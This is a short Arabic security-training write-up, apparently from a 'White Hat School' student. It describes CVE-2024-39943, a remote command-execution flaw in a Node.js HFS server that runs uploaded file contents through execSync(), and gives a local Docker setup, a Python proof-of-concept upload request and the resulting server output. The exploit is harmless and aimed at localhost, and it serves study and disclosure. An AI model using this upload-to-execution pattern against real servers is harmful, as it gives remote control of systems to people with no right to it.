
الدفعة الثالثة من مدرسة القبعة البيضاء – نو جونغ مين (@JenmrR)
في بيئة خادم HFS القائمة على Node.js، توجد ثغرة يتم فيها تنفيذ محتوى الملف المرفوع عبر child_process.execSync().
يمكن للمهاجم تنفيذ أوامر نظام التشغيل مباشرة من خلال ميزة رفع الملفات، والاطلاع على نتائج الأوامر الداخلية للخادم أو التحكم في النظام.
هذه ثغرة تتوافق مع CVE-2024-39943، وتشكّل تهديدًا بنفس مستوى حقن الأوامر (Remote Code Execution).
/upload، وينفّذ محتوى الملف المرفوع كأمر مباشرة$ sudo docker-compose up --build -d
$ python3 poc.py
import requests
payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }
r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)
استجابة الخادم بعد تنفيذ PoC:
Executed:
Hello_From_Hacked_Server

execSync() يشكّل خطرًا أمنيًا بالغ الخطورة.